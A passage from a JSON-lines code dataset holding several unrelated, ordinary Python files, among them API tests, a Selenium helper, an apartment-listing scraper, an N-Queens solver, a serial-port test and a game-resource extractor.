{\n 'macromodulation_name': 'TEST_CREATE_MODULATION',\n '_CRITICAL': 10,\n '_WARNING': 20\n }\n )\n )\n\n def test_delete_macromodulation(self):\n 
self.assertIsNotNone(\n self.mongoconnection.shinken.macromodulations.find_one(\n {\"macromodulation_name\": 'HighDuringNight'}\n )\n )\n\n self.delete('/v2/config/macromodulations/HighDuringNight')\n\n self.assertIsNone(\n self.mongoconnection.shinken.macromodulations.find_one(\n {\"macromodulation_name\": 'HighDuringNight'}\n )\n )\n\n def test_put_macromodulation(self):\n self.assertEqual(\n self.mongoconnection.shinken.macromodulations.find_one(\n {'macromodulation_name': 'HighDuringNight'}\n )['modulation_period'],\n 'night'\n )\n\n self.put_json(\n '/v2/config/macromodulations/HighDuringNight',\n {\"macromodulation_name\": \"HighDuringNight\",\n \"modulation_period\": \"TESTUPDATE\"}\n )\n\n self.assertEqual(\n self.mongoconnection.shinken.macromodulations.find_one(\n {'macromodulation_name': 'HighDuringNight'}\n )['modulation_period'],\n 'TESTUPDATE'\n )\n","sub_path":"surveil/tests/api/controllers/v2/config/test_macromodulations.py","file_name":"test_macromodulations.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450013380","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom utilities.BasePopUp import BasePopUp\n\n\nclass TreeListPopUp(BasePopUp):\n expand_icon = (By.CSS_SELECTOR, 'span.k-icon.k-i-expand')\n nested_group = (By.CSS_SELECTOR, 'ul.k-group')\n\n def __init__(self, driver, name: str):\n super(TreeListPopUp, self).__init__(driver, name)\n self.list_rows = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'li[role=\"treeitem\"]')),\n 'There is no option in treelist {}'.format(self.pop_up_name))\n self.list = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'span[class=\"k-in\"]')),\n 'There is no option in treelist {}'.format(self.pop_up_name))\n\n def 
choose_all_options(self):\n for el in self.list:\n el.click()\n self.close_widget_window()\n return self\n\n def choose_option_by_index(self, list_of_index):\n try:\n for index in list_of_index:\n self.list[index].click()\n except IndexError:\n print('There is no element with index ' + str(list_of_index))\n self.close_widget_window()\n return self\n\n def select_list_of_webelements_from_tree_by_names(self, list_of_names):\n '''Select assortment items from the tree according to assortment names'''\n\n for name in list_of_names:\n assortment_xpath = \"//ul[@class='k-group k-treeview-lines']//span[./text()= '%s']\" % name\n el_list = WebDriverWait(self.pop_up, 5).until(EC.presence_of_element_located((By.XPATH,\n assortment_xpath)), 'Assortment is absent')\n el_list.click()\n\n def open_base_treeitem(self, index):\n expand_icon = WebDriverWait(self.list_rows[index], 5).until(EC.visibility_of_element_located(self.expand_icon),\n 'Category has not child items')\n expand_icon.click()\n nested_group = WebDriverWait(self.list_rows[index], 5).until(EC.visibility_of_element_located(self.nested_group),\n 'Category has not child items')\n return nested_group\n\n def choose_all_options_from_nested_group(self, nested_group_element):\n nested_list = WebDriverWait(nested_group_element, 5).until\\\n (EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'span[class=\"k-in\"]')),\n 'There is no option in nested treelist {}'.format(self.pop_up_name))\n for el in nested_list:\n el.click()\n self.close_widget_window()\n return self\n\n def choose_option_by_index_from_nested_group(self, nested_group_element, list_of_index):\n nested_list = WebDriverWait(nested_group_element, 5).until\\\n (EC.visibility_of_any_elements_located((By.CSS_SELECTOR, 'span[class=\"k-in\"]')),\n 'There is no option in nested treelist {}'.format(self.pop_up_name))\n try:\n for index in list_of_index:\n nested_list[index].click()\n except IndexError:\n print('There is no element with index ' + str(list_of_index) 
+ ' in nested group')\n self.close_widget_window()\n return self\n\n\n\n","sub_path":"utilities/TreeListPopUp.py","file_name":"TreeListPopUp.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12834253","text":"\"\"\"Parse an apartments.com search result page and export to CSV.\"\"\"\n\nimport csv\nimport json\nimport sys\nimport datetime\nimport requests\nimport os\nimport traceback\nfrom bs4 import BeautifulSoup\nimport parse_apartments as parsing\nfrom output_formatter import OutputFile\nimport logging\n\n# Config parser was renamed in Python 3\ntry:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\n\ndef scrapeApartments(out, search_urls, max_pages, ignore_duplicates, config):\n \"\"\"goes through each apartment search page URL and scrapes the data\"\"\"\n # parse current entire apartment list including pagination for all search urls\n apartments = [] #List of visited apartment URLs to avoid duplicate entries\n for url in search_urls:\n url = url.strip()\n if not url.endswith('/'):\n url = url + '/'\n scrapeSearchPage(out, url, 1, max_pages, ignore_duplicates, apartments, config)\n\n\ndef scrapeSearchPage(out, page_url, page_num, max_pages, ignore_duplicates, apartmentList, config):\n \"\"\"Given the current page URL, extract the information from each apartment in the list\"\"\"\n url = page_url\n metadata = url.find('?')\n if metadata > -1:\n url = url[:metadata] + str(page_num) + \"/\" + url[metadata:]\n else:\n if not url.endswith(\"/\"):\n url += \"/\"\n url += str(page_num) + \"/\"\n\n logging.info(\"Now getting apartments from page \" + str(page_num) + \": %s\" % url)\n\n # read the current page\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n page = requests.get(url, headers=headers)\n \n # soupify the current page\n soup = 
BeautifulSoup(page.content, 'html.parser')\n soup.prettify()\n\n # get the element that contains the apartment list\n soup = soup.find('div', class_='placardContainer')\n\n # append the current apartments to the list\n for item in soup.find_all('article', class_='placard'):\n data_url = item.get('data-url')\n if data_url is None: \n continue\n\n # get the name for user/debug info\n name = \"N/A\"\n obj = item.find('span', class_='js-placardTitle')\n if obj is not None:\n name = obj.getText().strip()\n\n if ignore_duplicates and (data_url in apartmentList):\n logging.info('Skipping duplicate: %s' % name)\n continue\n\n #Take note of the url so we don't accidently create a duplicate entry later\n apartmentList.append(data_url)\n\n #print some user/debug info\n logging.info(\"Collecting data for: %s\" % name)\n\n #request the page and parse the data\n apartmentPage = requests.get(data_url, headers=headers)\n apartmentSoup = BeautifulSoup(apartmentPage.content, 'html.parser')\n apartmentSoup.prettify()\n parsing.parseApartmentPage(apartmentSoup, out, data_url, config)\n\n # recurse until the last page\n if page_num < max_pages:\n scrapeSearchPage(out, page_url, page_num + 1, max_pages, ignore_duplicates, apartmentList, config)\n\ndef loadConfigFromValuesNoCase(conf, key, values):\n \"\"\"NOTE: The values must all be lowercase (e.x. 
\\\"highest\\\")\"\"\"\n value = conf.get('all', key).lower()\n if value in values:\n return value\n else:\n raise Exception(\"ERROR: Configuration \\'\" + key + \"\\' was an invalid value, unable to run!\")\n\ndef main():\n \"\"\"Read from the config file\"\"\"\n trueValues = ['T', 't', '1', 'True', 'true']\n priceSelectorValues = ['lowest', 'highest', 'average']\n\n conf = configparser.ConfigParser()\n config_file = os.path.join(os.path.dirname(__file__), \"config.ini\")\n conf.read(config_file)\n\n # get the apartments.com search URL(s)\n apartments_url_config = conf.get('all', 'apartmentsURL')\n urls = apartments_url_config.replace(\" \", \"\").split(\",\")\n\n #get max page numbers\n max_pages_config = conf.get('all', 'maxPageScrape')\n max_pages = 1\n try:\n max_pages = int(max_pages_config)\n except ValueError:\n max_pages = 1\n\n #get ignore duplicates config\n ignore_duplicates = conf.get('all', 'ignoreDuplicates') in trueValues\n\n #get other configs\n config = {}\n config['separateUtilities'] = (conf.get('all', 'separateUtilities') in trueValues)\n config['separatePets'] = (conf.get('all', 'separatePets') in trueValues)\n config['separateParking'] = (conf.get('all', 'separateParking') in trueValues)\n config['priceSelector'] = loadConfigFromValuesNoCase(conf, 'priceSelector', priceSelectorValues)\n config['priceAdjustment'] = (conf.get('all', 'priceAdjustment') in trueValues)\n config['adjustPrice'] = {\n \"Air Conditioning\": int(conf.get('all', 'adjustACPrice')),\n \"Electric\": int(conf.get('all', 'adjustElectricPrice')),\n \"Gas\": int(conf.get('all', 'adjustGasPrice')),\n \"Heat\": int(conf.get('all', 'adjustHeatPrice')),\n \"Sewage\": int(conf.get('all', 'adjustSewagePrice')),\n \"Trash\": int(conf.get('all', 'adjustTrashPrice')), \n \"Water\": int(conf.get('all', 'adjustWaterPrice')),\n \"Other\": int(conf.get('all', 'adjustOtherPrice'))\n }\n #Make sure if there are utilities not listed that we add default values\n for util in 
OutputFile.values['utilities']:\n if util not in config['adjustPrice']:\n config['adjustPrice'][util] = 0\n\n # get the name of the output file\n fname = conf.get('all', 'fname')\n\n #Attempt to remove old output file to make sure we have write permissions\n try:\n os.remove(fname + \".xlsx\")\n except PermissionError:\n logging.error(\"The output file is being used by another process. Try closing the file then run the program again: \\'\" + fname + \".xlsx\\'\")\n return\n except FileNotFoundError:\n #We don't actually care about this error, we can ignore it.\n pass\n\n #Create the output file and start the scraping\n out = OutputFile(fname, config)\n try:\n scrapeApartments(out, urls, max_pages, ignore_duplicates, config)\n except Exception:\n logging.exception(\"An error has occured!\")\n finally:\n out.close()\n logging.info(\"Finished\")\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, handlers=[\n logging.FileHandler(filename='logging.log'),\n logging.StreamHandler(sys.stdout)\n ])\n main()\n","sub_path":"scrape_apartments.py","file_name":"scrape_apartments.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"536112765","text":"\"\"\"\nThis module contains a function that returns training set for functions to approximate\n\"\"\"\n\nimport random\nimport numpy as np\n\nfrom varro.algo.problems import Problem\n\n\ndef rastrigin(x):\n \"\"\"Rastrigin function\n\n Args:\n x (list): Input list\n\n Returns:\n Outputs of the rastrigin function given the inputs\n \"\"\"\n x = np.asarray_chkfinite(x)\n n = len(x)\n return 10*n + np.sum(x**2 - 10 * np.cos( 2 * np.pi * x))\n\ndef rosenbrock(x):\n \"\"\"Rosenbrock function\n\n Args:\n x (list): Input list\n\n Returns:\n Outputs of the rosenbrock function given the inputs\n \"\"\"\n x = np.asarray_chkfinite(x)\n x0 = x[:-1]\n x1 = x[1:]\n return (np.sum( (1 - x0) **2 ) + 100 * np.sum( (x1 - x0**2) **2 
))\n\nclass ProblemFuncApprox(Problem):\n def __init__(self, func):\n # Set seed\n random.seed(100)\n\n # Choose classification or regression\n self._approx_type = Problem.REGRESSION\n self._name = func\n self._input_dim = 1\n self._output_dim = 1\n\n # Set the X_train and y_train for function to approximate\n self.reset_train_set()\n\n def sample_float(self, start, end, step, size=500):\n \"\"\"Gets a random list of floats from a range of floats\n\n Args:\n start (float): The lower bound of our range\n end (float): The upper bound of our range\n step (float): The precision of our floats to be sampled\n size (int): Number of floats to sample from list\n\n Returns:\n A random sample of floats from the list\n \"\"\"\n self.minimum = start\n self.maximum = end\n return random.sample(list(np.arange(start, end, step)), k=size)\n\n def sample_int(self, start, end, size=500):\n \"\"\"Gets a random list of ints from a range of ints\n\n Args:\n start (int): The lower bound of our range (inclusive)\n end (int): The upper bound of our range (exclusive)\n size (int): Number of ints to sample from list\n\n Returns:\n A random sample of ints from the list\n \"\"\"\n self.minimum = start\n self.maximum = end\n return np.random.randint(start, end, size=size)\n\n def sample_bool(self, size=500):\n \"\"\"Gets a random list of bools, with the same number of 1's and 0's\n\n Args:\n size (int): Number of bools to sample\n\n Returns:\n A random sample of bools from the list\n \"\"\"\n self.minimum = 0\n self.maximum = 1\n sample = np.concatenate((np.zeros(size//2, dtype=np.int8), np.ones(size//2, dtype=np.int8)))\n np.random.shuffle(sample)\n return sample\n\n def reset_train_set(self):\n \"\"\"Sets the ground truth training input X_train and output y_train\n for the function specified to approximate\n\n \"\"\"\n func = self._name\n if func == 'sin':\n self.X_train = self.sample_float(-2*np.pi, 2*np.pi, 0.001)\n self.y_train = np.sin(self.X_train)\n elif func == 'sin:int12':\n 
self.X_train = self.sample_int(0, 2^12, size=40)\n X_unscaled = np.copy(self.X_train).astype(float)\n X_unscaled *= 2*np.pi / float(2^12)\n self.y_train = np.sin(self.X_train)\n elif func == 'cos':\n self.X_train = self.sample_float(-2*np.pi, 2*np.pi, 0.001)\n self.y_train = np.cos(self.X_train)\n elif func == 'tan':\n self.X_train = self.sample_float(-2*np.pi, 2*np.pi, 0.001)\n self.y_train = np.tan(self.X_train)\n elif func == 'x':\n self.X_train = self.sample_float(-10, 10, 0.001)\n self.y_train = self.X_train\n elif func == 'ras':\n self.X_train = self.sample_float(-5.12, 5.12, 0.01)\n self.y_train = rastrigin(self.X_train)\n elif func == 'rosen':\n self.X_train = self.sample_float(-10, 10, 0.001)\n self.y_train = rosenbrock(self.X_train)\n elif func == 'step':\n self.X_train = self.sample_float(-10, 10, 0.001)\n self.y_train = (np.array(self.X_train) > 0).astype(float)\n elif func == 'simple_step':\n self.X_train = self.sample_bool(size=40)\n self.y_train = self.X_train\n else:\n raise ValueError('Problem \\'' + str(func) + '\\' not recognised')\n","sub_path":"varro/algo/problems/func_approx.py","file_name":"func_approx.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176789961","text":"import sys\nimport time\nimport os\nimport datetime\n\n\nclass InboxFile:\n\n def __init__(self, path=\"\", fileName=\"\"):\n\n fileName, fileExt = os.path.splitext(fileName)\n self.filePath = path\n self.fileName = fileName\n self.fileExt = fileExt\n\n self.datetime = None\n self.fileType = None\n\n\n def exists(self):\n \"\"\"\n \"\"\"\n if not os.path.isfile(os.path.join(self.filePath, self.fileName + \\\n self.fileExt)):\n\n print(self.fileName + self.fileExt + \" does not exist.\")\n return False\n\n return True\n\n\n def findDatetimeAndType(self, format_dict):\n \"\"\"\n \"\"\"\n\n for f in format_dict.keys():\n try:\n d = datetime.datetime.strptime(self.fileName, 
format_dict[f])\n self.datetime = d\n self.fileType = f\n return True\n except ValueError as err:\n pass\n\n return False\n\n\n def renameFile(self, format_dict):\n \"\"\"\n \"\"\"\n\n if self.exists():\n\n if self.datetime is None:\n print('Unable to rename file because self.datetime is None')\n else:\n fileName_new = self.datetime.strftime(format_dict[self.fileType])\n item_new = fileName_new + self.fileExt\n\n src = os.path.join(self.filePath, self.fileName + self.fileExt)\n dst = os.path.join(self.filePath, fileName_new + self.fileExt)\n\n\n if os.path.isfile(dst):\n print('file ' + item_new + ' already exists. Did not rename the file.')\n\n else:\n os.rename(src, dst)\n print('file ' + self.fileName + self.fileExt + ' renamed as ' + item_new + '.')\n self.fileName = fileName_new\n\n\n def createTextFile(self):\n\n if self.exists():\n textFile = os.path.join(self.filePath, self.fileName + '.txt')\n if not os.path.isfile(textFile):\n open(textFile, 'a').close()\n\n print(textFile + ' created.')\n\n\n\n def archiveFile(self, path_to_archive):\n\n # create and make sure destination path exists\n p = os.path.join(path_to_archive, str(self.d.year), \\\n str(self.d.month), str(self.d.day))\n if not os.path.exists(p):\n os.makedirs(p)\n\n # move file\n src = os.path.join(self.path, self.fileName + self.fileExt)\n dst = os.path.join(path_to_archive, self.fileName + self.fileExt)\n\n if os.path.isfile(dst):\n print('file ' + dst + ' already exists. 
Did not move the file.')\n\n else:\n os.rename(src, dst)\n\n print('file ' + src + ' moved to ' + dst + '.')\n\n\n\n\n\ndef monitor_directory(inbox, archive, receipts_archive, image_archive, \\\n inbox_formats, storage_formats):\n \"\"\"\n\n\n \"\"\"\n\n\n # inbox\n contents = os.listdir(inbox)\n for item in contents:\n\n inboxItem = InboxFile(inbox, item)\n\n # Rename file\n if inboxItem.findDatetimeAndType(inbox_formats):\n inboxItem.renameFile(storage_formats)\n\n # Create text file\n if inboxItem.findDatetimeAndType(storage_formats):\n inbox.createTextFile()\n\n # # archive\n # contents = os.listdir(archive)\n # for item in contents:\n # inboxItem = InboxFile(inbox, item)\n\n # if inboxItem.exists:\n # inboxItem\n\n\n\n\n\n\n\n # # archive\n # contents = os.listdir(archive)\n # for item in contents:\n # fileName, fileExtension = os.path.splitext(item)\n\n # # determine file type\n # ftype = format_to_type(fileName)\n\n # # receipt-genius-scans\n # if (ftype == 'receipt-general') and (fileExtension == '.pdf'):\n\n # item_pdf = item\n # item_txt = fileName + '.txt'\n\n # if os.path.isfile(os.path.join(archive, item_txt)):\n\n # archive_file(archive, receipts_archive,\n # storage_formats[ftype], item_pdf)\n\n # archive_file(archive, receipts_archive,\n # storage_formats[ftype], item_txt)\n\n # else:\n\n # print('text file ' + str(item_txt) + 'does not exist. 
\\\n # Did not archive this file.')\n\n # # statement\n # if ((ftype == 'statement-citi') or \n # (ftype == 'statement-pnc') or\n # (ftype == 'statement-ing') or\n # (ftype == 'statement-fnbk')) and (fileExtension == '.pdf'):\n\n # item_pdf = item\n\n # archive_file(archive, receipts_archive,\n # storage_formats[ftype], item_pdf)\n\n # # image\n # if (ftype == 'image') and (fileExtension == '.jpg'):\n\n # item_jpg = item\n # item_txt = fileName + '.txt'\n\n # if os.path.isfile(os.path.join(archive, item_txt)):\n\n # archive_file(archive, image_archive,\n # storage_formats[ftype], item_jpg)\n\n # archive_file(archive, image_archive,\n # storage_formats[ftype], item_txt)\n\n # else:\n\n # print('text file ' + str(item_txt) + 'does not exist. \\\n # Did not archive this file.')\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\n inbox = \"/media/elements/inbox/\"\n archive = \"/media/elements/inbox/archive/\"\n receipts_archive = \"/media/elements/archive/receipts/\"\n image_archive = \"/media/elements/Media/Pictures/\"\n\n\n inbox_formats = {\n 'receipt-genius-scan' : '%m-%d-%Y %I-%M %p',\n 'image-phone' : 'IMG_%Y%m%d_%H%M%S',\n 'panorama-phone' : 'PANO_%Y%m%d_%H%M%S',\n 'statement-citi' : '%m-%d-%Y-citi',\n 'statement-pnc' : '%m-%d-%Y-pnc',\n 'statement-ing' : '%m-%d-%Y-ing',\n 'statement-fnbk' : '%m-%d-%Y-fnbk',\n }\n\n storage_formats = {\n 'receipt-genius-scan' : '%Y%m%d_%H%M%S',\n 'image-phone' : '%Y%m%d_%H%M%S',\n 'panorama-phone' : '%Y%m%d_%H%M%S',\n 'statement-citi' : '%Y%m%d_%H%M%S_citi',\n 'statement-pnc' : '%Y%m%d_%H%M%S_pnc',\n 'statement-ing' : '%Y%m%d_%H%M%S_ing',\n 'statement-fnbk' : '%Y%m%d_%H%M%S_fnbk',\n 'generic' : '%Y%m%d_%H%M%S'\n }\n\n while true:\n monitor_directory(inbox, archive, receipts_archive, image_archive, \\\n inbox_formats, storage_formats)\n 
time.sleep(300)","sub_path":"inbox_monitor/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23869891","text":"class Solution(object):\n def totalNQueens(self, n):\n result_list = []\n def dfs(queen_list, check1_list, check2_list):\n row = len(queen_list)\n if row == n:\n result = ['.' * k + 'Q' + '.' * (n - 1 - k) for k in queen_list]\n result_list.append(result)\n return\n for i in range(n):\n if i in queen_list or row - i in check1_list or row + i in check2_list: \n continue\n new_queen_list = queen_list + [i]\n new_check1_list = check1_list + [row - i]\n new_check2_list = check2_list + [row + i]\n dfs(new_queen_list, new_check1_list, new_check2_list)\n dfs([], [], [])\n return len(result_list)\n \n \nif __name__ == '__main__':\n solution = Solution()\n result = solution.totalNQueens(4)\n print(result)","sub_path":"01_LeetCode/0052/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413575711","text":"#!/usr/bin/python3\r\n'''\r\nThe defaultdict tool is a container in the collections class of Python. \r\nIt's similar to the usual dictionary (dict) container, but it has one difference: \r\nThe value fields' data type is specified upon initialization. \r\n\r\n\r\n a Python dictionary throws a KeyError if you try to get an item with a key that is not currently \r\nin the dictionary. The defaultdict in contrast will simply create any items that you try to \r\naccess (provided of course they do not exist yet). i\r\n\r\ndefaultdict means that if a key is not found in the dictionary, then instead of a KeyError being \r\nthrown, a new entry is created. 
The type of this new entry is given by the argument of defaultdict\r\n'''\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\nd=defaultdict(list) # THE VALUES OF THE DICT WILL BE LIST\r\n\r\nd['anandam'].append('E1001')\r\nd['grande'].append('E1101')\r\nd['sobha'].append('2094')\r\nd['sobha'].append('6052')\r\nd['prestige'].append('8051')\r\nd['prestige'].append('8133')\r\n\r\nfor i in d:\r\n print (i,':', d[i])\r\n\r\nprint ('keys of defaultdict:=',d.keys())\r\nprint ('Values of defaultdict:=',d.values())\r\nprint ('TYpe of defaultdict:-',type(d))\r\nprint ('*' * 40)\r\n\r\n\r\nd1=defaultdict(int) # THE VALUES OF THE DICT ARE INT\r\nfor i in range(10):\r\n d1[i] = i+i\r\n\r\nprint ('*' * 40)\r\n\r\nprint ('keys of defaultdict:=',d1.keys())\r\nprint ('Values of defaultdict:=',d1.values())\r\nprint ('TYpe of defaultdict:-',type(d1))\r\n\r\nprint ('*' * 40)\r\n\r\n# FOLLOWING CODE WILL GIVE KEYERROR, AS FOR THE \\\r\n# KEY DOESNT EXIST, WE CANT INITIALIZE ITS VALUE\r\ndel d\r\nd={}\r\ntry:\r\n \r\n d['anandam'].append('E1001')\r\n d['grande'].append('E1101')\r\n d['sobha'].append('2094')\r\n d['sobha'].append('6052')\r\n d['prestige'].append('8051')\r\n d['prestige'].append('8133')\r\n print ('keys of defaultdict:=',d.keys()) # THIS WILL THROW KEYERROR\r\n print ('Values of defaultdict:=',d.values())\r\nexcept:\r\n print ('DICT ERROR')\r\n","sub_path":"defaultdict_usuage.py","file_name":"defaultdict_usuage.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165810639","text":"# coding: utf-8\nimport unittest\n\nimport os\nimport serial\nimport time\n\n\nclass _TestRS232_Base(unittest.TestCase):\n port = None\n\n def setUp(self):\n assert self.port is not None\n self.ser = serial.Serial(self.port, 19200, timeout=3)\n self.ser.flush()\n self.ser.flushInput()\n self.ser.flushOutput()\n\n def test_echo(self):\n time.sleep(200E-3)\n data_to_write = '1234\\n'\n\n 
self.ser.write(data_to_write)\n self.ser.flush()\n time.sleep(1)\n data = self.ser.readline()\n self.ser.close()\n\n self.assertEqual(data, data_to_write, \" %s RS232 ERROR\\nTransmitted %s\\nReceived: %s\" % (self.port, data_to_write, data))\n\n def tearDown(self):\n self.ser.close()\n\nclass TestRS232Front(_TestRS232_Base):\n port = '/dev/ttyNSC2'\n\nclass TestRS232Back(_TestRS232_Base):\n port = '/dev/ttyNSC3'\n\n\n\n\n\nif __name__ == '__main__':\n suite = unittest.TestSuite()\n\n suite.addTest(unittest.makeSuite(TestRS232Back))\n suite.addTest(unittest.makeSuite(TestRS232Front))\n\n\n\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\n","sub_path":"examples/test_suite/kmon_func_test/rs232.py","file_name":"rs232.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"576463516","text":"#!/usr/bin/env python3\nfrom pict2svg import parse_pict, PictParseError\nfrom rsrc_tools import resource\nimport rsrc_tools.tmpl.reader as tmplReader\nimport rsrc_tools.bspt.reader as bsptReader\nimport os\nimport sys\nimport json\nimport subprocess\nimport time\nfrom pathlib import Path\n\nBSPS_DIR = \"bsps\"\nHSND_DIR = \"snd\"\nSVG_DIR = \"svg\"\n\nDEBUG_EXPORT = True\n\nEXPORT_SOUND = True\n\n\ndef is_exe(path):\n return os.path.isfile(path) and os.access(path, os.X_OK)\n\nif not is_exe(os.path.join(\"build\", \"hsnd2wav\")) and \\\n not is_exe(os.path.join(\"build\", \"hsnd2wav.exe\")):\n EXPORT_SOUND = False\n\nWAV2OGG = False\nfor path in os.environ[\"PATH\"].split(os.pathsep):\n bin_file = os.path.join(path, \"sndfile-convert\") \n exe_file = bin_file + \".exe\"\n if is_exe(exe_file) or is_exe(bin_file):\n WAV2OGG = True\n\ndef parse_level_rsrc(rpath, outpath, tmpl=None):\n manifest_data = {}\n data = open(str(rpath), 'rb').read()\n\n reader = resource.Reader()\n try:\n rsrc = reader.parse(data)\n except:\n return (None, None)\n\n if tmpl is not None:\n rsrc['TMPL'] = tmpl\n 
try:\n tmplData = tmplReader.parse(rsrc)\n except:\n print(f\"Failed parsing TMPL for {rpath}\")\n return (None, None)\n if 'LEDI' not in tmplData:\n print(f\"No LEDI in file {rpath}\")\n return (None, None)\n\n # avara reads the LEDI #128\n set_ledi = tmplData['LEDI'][128]\n set_tag = set_ledi[\"Set Tag\"]\n\n # the key for the list of levels is\n # five asterisks\n ledi_meta = {}\n for single_ledi in set_ledi[\"*****\"]:\n # store these in a dictionary by pict name\n ledi_meta[single_ledi[\"Path\"]] = single_ledi\n\n #rsrc = get_forks(data)\n print(rsrc.keys())\n if 'LEDI' not in rsrc:\n print(\"No LEDI found for set %s\" % rpath)\n return\n\n ledi = rsrc['LEDI']\n\n dirname = rpath.name.split('.')[0]# + \"_svg\"\n dirpath = os.path.join(outpath, dirname)\n os.makedirs(dirpath, exist_ok=True)\n\n logpath = os.path.join(dirpath, \"log.txt\")\n sys.stdout = open(logpath, \"w\")\n\n svgdir = os.path.join(dirpath, SVG_DIR)\n os.makedirs(svgdir, exist_ok=True)\n\n if 'PICT' in rsrc:\n print(rsrc['PICT'].keys())\n picts = rsrc['PICT']\n for pict in picts:\n name = picts[pict][\"name\"]\n # make sure we have an LEDI for this\n if name not in ledi_meta:\n print(\"%s is not in LEDI, skipping\" % name)\n continue\n\n meta = ledi_meta[name]\n data = picts[pict][\"data\"]\n # print(data)\n \n filename = (\"%s_%s.svg\" % (str(pict), name)).replace(\" \", \"_\")\n\n if DEBUG_EXPORT:\n print(pict)\n print(name)\n print(filename)\n #print(meta[\"Name\"].encode('macintosh'))\n #print(meta[\"Message\"].encode('macintosh'))\n ledi_meta[name][\"Svg\"] = filename\n fn = os.path.join(svgdir, filename)\n # if os.path.isfile(fn):\n # print(\"%s was found, skipping\" % fn)\n # continue\n try:\n xml_text = parse_pict(fn, data)\n except PictParseError:\n print(F\"Could not parse {fn} - {meta['Name']} because of unknown opcode\")\n continue\n try:\n with open(fn, \"w\", encoding=\"utf-8\") as xml_file:\n xml_file.write(xml_text.decode(\"utf-8\"))\n except:\n print(f\"Couldn't write {fn}, 
probably because it is stupid\")\n\n manifest_data[\"LEDI\"] = {v[\"Tag\"]:v for (_, v) in ledi_meta.items()}\n\n if 'BSPT' in rsrc:\n bspt_meta = {}\n bspdir = os.path.join(dirpath, BSPS_DIR)\n os.makedirs(bspdir, exist_ok=True)\n bsps = bsptReader.parse(rsrc['BSPT'])\n for bsp in bsps:\n #filename = \"%d_%s.avarabsp.json\" % (bsp.res_id, bsp.name)\n filename = F\"{bsp.res_id}.json\"\n fn = os.path.join(bspdir, filename)\n if DEBUG_EXPORT:\n print(\"Writing BSPT %s\" % fn)\n with open(fn, \"w\") as bsp_file:\n bsp_file.write(bsp.avara_format())\n bspt_meta[bsp.res_id] = {\n \"name\": bsp.name,\n \"file\": fn\n }\n manifest_data[\"BSPT\"] = bspt_meta\n\n if 'HSND' in rsrc and EXPORT_SOUND:\n hsnd_meta = {}\n snddir = os.path.join(dirpath, HSND_DIR)\n os.makedirs(snddir, exist_ok=True)\n for hsnd_id in rsrc['HSND'].keys():\n hsnd_name = rsrc['HSND'][hsnd_id][\"name\"]\n\n fn = str(hsnd_id) + \"_\" + \"\".join(c for c in hsnd_name if c.isalnum() or c in ('.', '_')).rstrip()\n wavpath = os.path.join(snddir, fn + \".wav\")\n if DEBUG_EXPORT:\n print(f\"Found HSND {hsnd_id} {hsnd_name} {fn}\")\n\n args = [f'build{os.path.sep}hsnd2wav', str(hsnd_id), wavpath, str(rpath)]\n print(args)\n popen = subprocess.Popen(args, stdout=subprocess.PIPE)\n popen.wait()\n\n if WAV2OGG:\n oggpath = os.path.join(snddir, fn + \".ogg\")\n args = ['sndfile-convert', '-vorbis', wavpath, oggpath]\n popen = subprocess.Popen(args, stdout=subprocess.PIPE)\n popen.wait()\n try:\n os.remove(wavpath)\n except FileNotFoundError:\n pass\n\n\n hsnd_meta[hsnd_id] = {\n \"name\": hsnd_name,\n \"file\": wavpath if not WAV2OGG else oggpath\n }\n\n if 'TEXT' in rsrc:\n txts = \"\".join({k:v[\"data\"].decode(\"macroman\") for (k,v) in rsrc[\"TEXT\"].items()}.values())\n txtpath = os.path.join(dirpath, \"default.avarascript\")\n with open(txtpath, \"w\", encoding=\"utf-8\") as txtfile:\n txtfile.write(txts.replace(\"\\r\", \"\\n\"))\n\n \n if 'HULL' in rsrc:\n manifest_data[\"HULL\"] = tmplData[\"HULL\"]\n\n 
